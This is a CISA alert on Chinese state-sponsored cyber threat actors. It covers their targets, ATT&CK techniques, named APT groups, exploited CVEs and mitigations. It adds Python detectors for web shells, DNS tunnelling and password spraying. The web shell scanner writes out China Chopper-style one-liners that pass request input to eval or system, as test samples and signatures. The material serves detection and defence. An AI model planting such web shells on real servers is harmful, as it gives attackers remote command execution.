Original release date: October 1, 2020
This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
In light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation’s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.
- Adopt a state of heightened awareness. Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.
- Increase organizational vigilance. Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.
- Confirm reporting processes. Ensure personnel know how and when to report an incident. The well-being of an organization’s workforce and cyber infrastructure depends on awareness of threat activity. Consider reporting incidents to CISA to help serve as part of CISA’s early warning system (see the Contact Information section below).
- Exercise organizational incident response plans. Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.
China Cyber Threat Profile
China has a history of using national military and economic resources to leverage offensive cyber tactics in pursuit of its national interests. The “Made in China 2025” 10-year plan outlines China’s top-level policy priorities; accordingly, China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery. China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.
The U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People’s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks, either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of its activities to secure information critical to advancing its economic prowess and competitive advantage.
Chinese Cyber Activity
According to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.
Additionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.
Public reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:
- February 2013 – Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China: a comprehensive report publicly exposed APT1 as part of China’s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries. APT1 established access to the victims’ networks and methodically exfiltrated IP across a large range of industries identified in China’s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).
- April 2017 – Chinese APTs Targeting IP in 12 Countries: CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.
- December 2018 – Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs): DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII. CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.
- February 2020 – China’s Military Indicted for 2017 Equifax Hack: DOJ indicted members of China’s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company’s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax’s trade secrets.
- May 2020 – China Targets COVID-19 Research Organizations: the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China. Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.
Common TTPs of Publicly Known Chinese Threat Actors
The section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions.
Chinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (Technical Information Gathering [TA0015]), staging (Stage Capabilities [TA0026]), and testing (Test Capabilities [TA0025]) before executing an attack. PRE-ATT&CK techniques can be difficult to detect and mitigate; however, defenders should be aware of the use of these techniques.
Table 1: Chinese threat actor PRE-ATT&CK techniques

| Technique | Description |
|---|---|
| Acquire and/or Use 3rd Party Software Services [T1330] | Staging and launching attacks from software-as-a-service solutions that cannot be easily tied back to the APT |
| Compromise 3rd Party Infrastructure to Support Delivery [T1334] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure) |
| Domain Registration Hijacking [T1326] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes |
| Acquire Open-Source Intelligence (OSINT) Data Sets and Information [T1247] | Gathering data and information from publicly available sources, including public-facing websites of the target organization |
| Conduct Active Scanning [T1254] | Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet |
| Analyze Architecture and Configuration Posture [T1288] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks |
| Upload, Install, and Configure Software/Tools [T1362] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access |
Enterprise ATT&CK TTPs
Chinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:
- Cobalt Strike and Beacon
- PowerShell Empire
- China Chopper Web Shell
Table 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&CK framework.
Table 2: Common Chinese threat actor techniques, detection, and mitigation

| Technique / Sub-Technique | Detection | Mitigation |
|---|---|---|
| Obfuscated Files or Information [T1027] | | |
| Phishing: Spearphishing Attachment [T1566.001] and Spearphishing Link [T1566.002] | | |
| System Network Configuration Discovery [T1016] | | |
| Command and Scripting Interpreter: Windows Command Shell [T1059.003] | | |
| User Execution: Malicious File [T1204.002] | | |
| Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] | | |
| Command and Scripting Interpreter: PowerShell [T1059.001] | | |
| Hijack Execution Flow: DLL Side-Loading [T1574.002] | | |
| Ingress Tool Transfer [T1105] | | |
| Remote System Discovery [T1018] | | |
| Software Deployment Tools [T1072] | | |
| Brute Force: Password Spraying [T1110.003] | | |
| Network Service Scanning [T1046] | | |
| Email Collection [T1114] | | |
| Proxy: External Proxy [T1090.002] | | |
| Drive-by Compromise [T1189] | | |
| Server Software Component: Web Shell [T1505.003] | | |
| Application Layer Protocol: File Transfer Protocols [T1071.002] and DNS [T1071.004] | | |
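The China Chopper web shell named in the tool list above and the Web Shell technique [T1505.003] in Table 2 are the same artifact seen from two angles: a server-side file, often only one line long, that hands request input straight to an execution primitive. The scanner below is an added example written for this page, not a CISA tool or anything from the referenced vendors. Its regular expressions are modelled on the publicly documented China Chopper ASPX and PHP one-liners plus a generic "request input reaches eval/system" pattern; the list of upload directories in which server-side code should never appear is an assumption; and the web root it scans is constructed in build_sample_tree() rather than taken from a real incident.

```python
"""Hunt for China Chopper-style web shells (ATT&CK T1505.003) on a web root."""
import os
import re
import tempfile

# Signatures modelled on the publicly documented China Chopper server-side
# one-liners, plus a generic "dangerous function fed from the request" check.
WEBSHELL_PATTERNS = {
    # ASPX form: <%eval(Request.Item["pass"],"unsafe");%>
    "china_chopper_aspx": re.compile(
        rb'\beval\s*\(\s*Request\.Item\s*\[[^\]]+\]\s*,\s*"unsafe"\s*\)', re.I),
    # PHP form: <?php @eval($_POST['pass']);?>
    "china_chopper_php": re.compile(
        rb'@?\beval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[[^\]]+\]\s*\)', re.I),
    # Any execution primitive whose argument is raw request input.
    "request_to_exec": re.compile(
        rb'\b(?:eval|assert|system|passthru|shell_exec|exec|popen)\s*\('
        rb'\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|REQUEST|GET|COOKIE)\b', re.I),
}
WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".asmx", ".jsp", ".jspx"}
# Assumption: these directories hold static content, so server-side code in
# them is suspicious on its own even if no signature fires.
UPLOAD_DIRS = {"uploads", "upload", "images", "img", "media", "tmp", "temp"}


def scan_file(path):
    """Return the sorted list of signature names that fire on one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return sorted(name for name, pat in WEBSHELL_PATTERNS.items() if pat.search(data))


def scan_tree(root):
    """Walk a web root; return {relative_path: [indicators]} for files that fire."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in WEB_EXTENSIONS:
                continue
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            hits = scan_file(full)
            if set(rel.lower().split("/")[:-1]) & UPLOAD_DIRS:
                hits.append("server_code_in_upload_dir")
            if hits:
                findings[rel] = sorted(hits)
    return findings


def build_sample_tree():
    """Create a constructed web root for demonstration (not real victim data)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "index.php": b"<?php $n = htmlspecialchars($_GET['name'] ?? ''); echo \"Hi $n\"; ?>",
        "aspnet_client/system_web/c.aspx":
            b'<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
        "uploads/avatar.php": b"<?php @eval($_POST['password']);?>",
        "uploads/logo.png": b"\x89PNG\r\n\x1a\n",
        "lib/helper.php": b"<?php system(base64_decode($_REQUEST['c'])); ?>",
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, indicators in sorted(scan_tree(build_sample_tree()).items()):
        print(path, "->", ", ".join(indicators))
```

Signature matching alone misses shells that obfuscate the eval call (which is why [T1027] sits in the same table), so the location heuristic and, in production, a comparison of the web root against a known-good deployment manifest should run alongside it.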
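For the DNS entry of Application Layer Protocol [T1071.004] in Table 2, the following heuristic is an added example written for this page, not part of the CISA alert. It scores DNS query logs for the shape that tunnelled C2 or exfiltration produces: a single registered domain receiving many queries, nearly all for distinct, long, high-entropy leftmost labels. The thresholds are illustrative assumptions to be tuned per environment, the registered-domain split (last two labels) is a simplification that a real deployment would replace with the Public Suffix List, and the query names are constructed in build_sample_queries().

```python
"""Heuristic detection of DNS-based C2/tunnelling (ATT&CK T1071.004) from query logs."""
import hashlib
import math
from collections import defaultdict


def shannon_entropy(text):
    """Bits of entropy per character of a string (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    counts = {ch: text.count(ch) for ch in set(text)}
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """Return (registered_domain, subdomain_labels).

    Assumption: the registered domain is the last two labels. Use the Public
    Suffix List in production so that names such as foo.co.uk split correctly.
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def score_domains(qnames, min_queries=20, min_unique_ratio=0.8,
                  min_label_len=20, min_entropy=3.0):
    """Flag registered domains whose query pattern looks like a tunnel.

    A tunnel encodes each outbound chunk into the leftmost label, so the domain
    sees many queries, almost all for distinct, long, high-entropy names.
    Thresholds are illustrative assumptions.
    """
    stats = defaultdict(lambda: {"queries": 0, "names": set(),
                                 "lengths": [], "entropies": []})
    for q in qnames:
        domain, subs = split_qname(q)
        s = stats[domain]
        s["queries"] += 1
        s["names"].add(".".join(subs))
        if subs:
            s["lengths"].append(len(subs[0]))
            s["entropies"].append(shannon_entropy(subs[0]))
    flagged = {}
    for domain, s in stats.items():
        if s["queries"] < min_queries:
            continue
        unique_ratio = len(s["names"]) / s["queries"]
        avg_len = sum(s["lengths"]) / len(s["lengths"]) if s["lengths"] else 0.0
        avg_ent = sum(s["entropies"]) / len(s["entropies"]) if s["entropies"] else 0.0
        if (unique_ratio >= min_unique_ratio and avg_len >= min_label_len
                and avg_ent >= min_entropy):
            flagged[domain] = {"queries": s["queries"],
                               "unique_ratio": round(unique_ratio, 2),
                               "avg_label_len": round(avg_len, 1),
                               "avg_entropy": round(avg_ent, 2)}
    return flagged


def build_sample_queries():
    """Constructed query names: ordinary lookups plus a simulated tunnel to example.org."""
    benign = (["www.example.com"] * 20 + ["mail.example.com"] * 5
              + ["cdn.example.com"] * 5 + ["portal.example.net"] * 8)
    # Each tunnel query carries a 52-character hex "chunk" in the leftmost label.
    tunnel = ["%s.sync.example.org" % hashlib.sha256(("chunk%d" % i).encode()).hexdigest()[:52]
              for i in range(40)]
    return benign + tunnel


if __name__ == "__main__":
    for domain, info in score_domains(build_sample_queries()).items():
        print(domain, info)
```

Legitimate services (CDNs, anti-spam lookups, some telemetry) also generate long unique labels, so the result is a triage queue rather than a verdict; the per-domain query volume and the set of clients asking should be checked before blocking.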
Additional APT Activity
The TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threat actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples include:
- APT3 (known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group’s custom implants and changing command and control (C2) infrastructure make it difficult to track. APT3 exploits use Rivest Cipher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR) and Data Execution Prevention (DEP) by using return-oriented programming (ROP) chains.
- APT10 (known as MenuPass Group) has established access to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.
- APT19 (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and makes sophisticated use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).
- APT40 (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.
- APT41 (known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.
Mitigations
The following list provides actionable technical recommendations for IT security professionals to reduce their organization’s overall vulnerability. These recommendations are not exhaustive; rather, they focus on the actions that will greatly reduce stakeholders’ attack surface.
- Patch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow remote code execution or denial of service on externally facing (i.e., internet-exposed) equipment. Certain vulnerabilities, including CVE-2012-0158 in Microsoft products, CVE-2019-19781 in Citrix devices, and CVE-2020-5902 in the BIG-IP Traffic Management User Interface, have presented APTs with prime targets for gaining initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities, an opportunistic approach that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs.
Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors

| Vulnerability | Vulnerable Products | Patch Information |
|---|---|---|
| CVE-2012-0158 | Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 | See CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities |
| CVE-2019-19781 | Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP | See CISA Alert AA20-020A |
| CVE-2020-5902 | F5 BIG-IP Traffic Management User Interface (TMUI) | See the F5 security advisory referenced in CISA Current Activity |
- Implement rigorous configuration management programs. Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks.
- Disable unnecessary ports, protocols, and services. Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell).
- Enhance monitoring of network and email traffic. Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse.
- Use protection capabilities to stop malicious activity. Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.
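The Password Spraying row [T1110.003] in Table 2, the password spraying noted in the COVID-19 research targeting above, and the recommendation to monitor for account misuse all point at the same detection problem: a spray is breadth over depth, one or two guesses against many accounts, so per-account lockout thresholds never trip. The detector below is an added example written for this page, not CISA tooling. It consumes failed-logon records laid out like the fields of Windows Security event 4625 (time, source address, target user, SubStatus) that are constructed in build_sample_log(); the window size and account-count thresholds are illustrative assumptions.

```python
"""Detect password spraying (ATT&CK T1110.003) in failed-logon records."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"
# Windows 4625 SubStatus codes: wrong password and unknown user name. A spray
# produces both, because the attacker's user list is rarely perfect.
FAILURE_CODES = {"0xc000006a", "0xc0000064"}


def parse_record(line):
    """Parse 'timestamp source_ip target_user substatus' into a tuple."""
    ts, ip, user, status = line.split()
    return datetime.strptime(ts, TIME_FMT), ip, user.lower(), status.lower()


def detect_password_spray(lines, window_minutes=30, min_accounts=10,
                          max_hits_per_account=2):
    """Return one alert per source that fails against many accounts a few times each.

    Within a sliding window the number of distinct target accounts must be high
    while no single account is tried more than max_hits_per_account times; a
    brute force against one account therefore does not fire. Thresholds are
    illustrative assumptions.
    """
    window = timedelta(minutes=window_minutes)
    events = sorted(parse_record(l) for l in lines if l.strip())
    by_source = defaultdict(list)
    for ts, ip, user, status in events:
        if status in FAILURE_CODES:
            by_source[ip].append((ts, user))
    alerts = []
    for ip, evs in by_source.items():
        win = deque()
        per_user = defaultdict(int)
        best = None
        for ts, user in evs:
            win.append((ts, user))
            per_user[user] += 1
            while ts - win[0][0] > window:  # slide the window forward
                _old_ts, old_user = win.popleft()
                per_user[old_user] -= 1
                if per_user[old_user] == 0:
                    del per_user[old_user]
            distinct = len(per_user)
            if distinct >= min_accounts and max(per_user.values()) <= max_hits_per_account:
                if best is None or distinct > best["distinct_accounts"]:
                    best = {"source": ip, "distinct_accounts": distinct,
                            "window_start": win[0][0].strftime(TIME_FMT),
                            "window_end": ts.strftime(TIME_FMT),
                            "accounts": sorted(per_user)}
        if best is not None:
            alerts.append(best)
    return alerts


def build_sample_log():
    """Constructed 4625-style records: one spraying host, one brute-forcing host, one typo."""
    base = datetime(2020, 9, 30, 8, 0, 0)
    users = ["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi",
             "ivan", "judy", "mallory", "niaj", "olivia", "peggy", "rupert"]
    lines = []
    # Spray: one guess against each of 15 accounts, one per minute.
    for i, user in enumerate(users):
        lines.append("%s 203.0.113.7 %s 0xC000006A"
                     % ((base + timedelta(minutes=i)).strftime(TIME_FMT), user))
    # Brute force: 30 rapid guesses against a single account.
    for i in range(30):
        lines.append("%s 198.51.100.9 admin 0xC000006A"
                     % (base + timedelta(seconds=10 * i)).strftime(TIME_FMT))
    # Benign: a user mistypes a password twice.
    for m in (3, 4):
        lines.append("%s 10.0.0.5 bob 0xC000006A"
                     % (base + timedelta(minutes=m)).strftime(TIME_FMT))
    return lines


if __name__ == "__main__":
    for alert in detect_password_spray(build_sample_log()):
        print(alert)
```

Sprays against cloud identity providers are often spread across many source addresses; keying the same window on user-agent, target application, or autonomous system instead of source IP catches that variant with the same logic.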
Contact Information
CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:
- 1-888-282-0870 (From outside the United States: +1-703-235-8832)
- Central@cisa.dhs.gov (UNCLASS)
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at http://www.us-cert.cisa.gov/.
References
- White House Publication: How China’s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World
- Congressional Research Service: ‘Made in China 2025’ Industrial Policies: Issues for Congress
- Council on Foreign Relations: Is ‘Made in China 2025’ a Threat to Global Trade
- Mandiant: APT1 Exposing One of China’s Cyber Espionage Units
- U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage
- CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors
- DOJ Press Release: Deputy Attorney General Rod J. Rosenstein Announces Charges Against Chinese Hackers
- CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers
- DOJ Press Release: Attorney General William P. Barr Announces Indictment of Four Members of China’s Military for Hacking into Equifax
- CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations
- CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services
- CISA Current Activity (CA): Chinese Malicious Cyber Activity
- FireEye Advanced Persistent Threat Groups
- MITRE ATT&CK: APT3
- MITRE ATT&CK: APT19
- MITRE ATT&CK: APT41
- CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities
- CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP
- CISA CA: F5 Releases Security Advisory for BIG-IP TMUI RCE Vulnerability, CVE-2020-5902
Revisions
- October 1, 2020: Initial Version